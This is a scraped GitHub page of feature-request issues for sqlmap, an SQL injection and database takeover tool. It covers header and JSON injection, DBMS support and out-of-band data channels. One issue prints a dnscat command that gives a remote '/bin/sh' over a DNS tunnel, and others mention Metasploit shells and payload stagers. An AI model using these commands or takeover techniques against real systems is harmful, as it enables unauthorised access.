sqlmapproject / sqlmap Goto Github PK
View Code? Open in Web Editor NEWAutomatic SQL injection and database takeover tool
Home Page: http://sqlmap.org
License: Other
Automatic SQL injection and database takeover tool
Home Page: http://sqlmap.org
License: Other
Add support to test and exploit SQLi in any header of the request.
This requires some refactoring and a layer of abstraction when parsing params/values.
the newly added switches/options are not documented in the manual.
Examples: --hex, --host, --force-ssl, --titles, --check-tor, ....
But they are visible using the -h option so its no big deal ;)
This is related to issue #46.
References:
Design and implement a mechanism to identify a session expire (eg. 302 to /login page, not Set-Cookie issued, etc) and automatically re-authenticate given the raw authentication request from the user.
Test
Add support to generate a report, at least in XML/XSLT format.
PostgreSQL 9.0, 9.1 and 9.2 are out since a while now. We need to compile UDFs for those versions too, both 32-bit and 64-bit on Linux and Windows.
We have a clean mechanism to handle custom DBMS specific statements when they do not fit in xml/queries.xml, we should rather use it and remove all hard-coded custom statements from the source code.
Closely related to issue #33.
Possible enhancements to --crawl are:
We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.
DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.
Example of string on the authoritative DNS server for tun.yourdomain.org
:
sudo ./dnscat --listen
Example of string of the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"
Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.
Create test environment (as in .SQL files to create table with relevant encoding + entries) for localized data like russian, portuguese and chinese and binary data (like an image to test safe2bin).
Identify linked/cluster DBMS servers when possible (e.g. MSSQL)
It would be great to give sqlmap a WSDL file or WSDL url, it parses it and start assessing each tag method for SQL injections. Example: http://demo.testfire.net/bank/ws.asmx?WSDL.
Support for SOAP parsing/injection has been already implemented, see http://bernardodamele.blogspot.com/2010/06/sqlmap-and-soap-based-web-services.html. Need to extend it to forge different "URLs" for each method of the parsed WSDL.
Rewrite --update to update sqlmap from GitHub ('git pull' and GitPython or another library)
Update function/class/method docstrings (where applicable)
Add support to search for a specific row in the table given its content snippet (LIKE '%value of -E%')
Add basic/advanced help mechanism
Add support to takeover the file system when the back-end DBMS is Oracle.
References:
Discuss and implement solution for DBMS specific detection/enumeration limitations:
Add support to automatically parse JSON data (eg. {"prefixText":"abc","count":20}
) and be able to test and exploit SQLi in each JSON param's value.
It would be great if you can disable the password cracking feature with another parameter when running in batch mode.
Sometimes you only want to extract the data and using the --batch switch is the only way to extract a big database in the background.
Adapt dbms modules/methods/xml queries file for usage with different versions of the dbms.
For instance, kb.dbmsVersion is already used within MSSQL to determine how to re-enable the xp_cmdshell procedure. This will also be useful for Firebird and in general replaces the ugly "query"/"query2" used in the queries.xml with some proper "minver"/"maxver" that specify which query apply to which dbms version.
To be worked closely to ticket #24.
Recently we implemented DNS for data fetching. The objective is to implement more out-of-band techniques for data fetching:
Some relevant materials:
Maybe it would be good to use some sql parser, http://pyparsing.wikispaces.com/
See:
Work on this alongside issue #44.
One directory (procs/) with usable PL/SQL, SQL and T-SQL scripts which can be injected when stacked queries are supported or with direct connection (-d).
Closely related to issue #51.
"Looks like sqlmap has an issue while using --random-agent with -g argument as it always returns "unable to find results for your Google dork expression" though it works fine without suppling --random-agent."
When stacked queries is supported use OPENROWSET (MSSQL) and dblink() (PostgreSQL) to run a statement as a different user (e.g. higher privileged user for instance after a password cracking attack).
The same library code can be used in ticket #31.
References:
--hpp
--hpp
Adding full support for another dbms is a pain in the ass 'cause around the whole code there's stuff like if kb.dbms == "MySQL" [...] elif kb.dbms in ( "Oracle" etc.. it would be very intelligent to remove this dbms specific stuff in libs like lib/core/agent.py (grep for kb.dbms, you'll see) and have it ALL would be nice in plugins/dbms//language.py or similar so code would be much easier to maintain and most important far easier to add a new dbms.
Add support to takeover the file system when the back-end DBMS is IBM DB2
Add support to takeover the operating system when the back-end DBMS is IBM DB2
In both --file-upload and --os-pwn provide the user with the option to download onto the DBMS filesystem the payload stager (or shellcodeexec executable) via HTTP/TFTP/FTP server from the attacker (or a staged third-party server) machine rather than uploading it via SQL payload's file write methods.
Port the same concept eventually to --file-download too.
Libraries:
I think that this can be done taking advantage of the object that handles --forms (forms parsing) switch.
Create some test environment pages for injecting into PL/SQL code (Oracle) and T-SQL statements (MSSQL).
Quoting a user:
The problem is that vulnerable list.php script limits number of outputted items --- it always show only first 10 items omitting others on PHP level (without using MySQL LIMIT clause), so sqlmap incorrectly detects number of columns, number of rows etc --- always limiting number of items to 10.
I looked in documentation and didn't found any options for splitting enumeration requests on bunch of requests limited by some value of outputted items (e.g. query all table rows selecting by 10 rows at single query). Can you add such options or tell me how can I achieve my goal with current version of sqlmap (I'm using trunk version)?
Another suggestion:
Also I want to propose checking if all of requested items was received by adding extra UNION SELECT at end with some end mark and checking is that end mark is received. I don't know details of sqlmap implementation so not sure is my proposition is correct.
Example:
Send your requests to /post.php but look at/fetch /index.php after you submitted to /post.php for detection/exploitation
Check and eventually implement new/updated blind sql injection exploitation techniques:
There are noticed cases when last character of output is trimmed:
[15:02:01] [INFO] testing MySQL
[15:02:03] [WARNING] reflective value(s) found and filtering out
[15:02:03] [WARNING] possible server trimmed output detected (due to its length): 1:ugd-->
[15:02:03] [WARNING] the back-end DBMS is not MySQL
[15:02:03] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
In given case kb.chars.stop was :ugd: but at the output it appeared as :ugd because of last character removal (in web application logic). Detect this and patch it. |
Both for attacker (after the DBMS fingerprint output) and for developer/DBA (at the end, just before the "shutting down" message).
Report also about known vulnerabilities based on DBMS exact version (consider backporting!) and known Metasploit exploits.
Now that Metasploit properly runs on Windows too (without cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, --os-pwn/--os-smbrelay/--os-smb code need to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.
Enumerate binary fields data as in images for instance
Possible references:
Add support to takeover the operating system when the back-end DBMS is Oracle.
References:
test
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.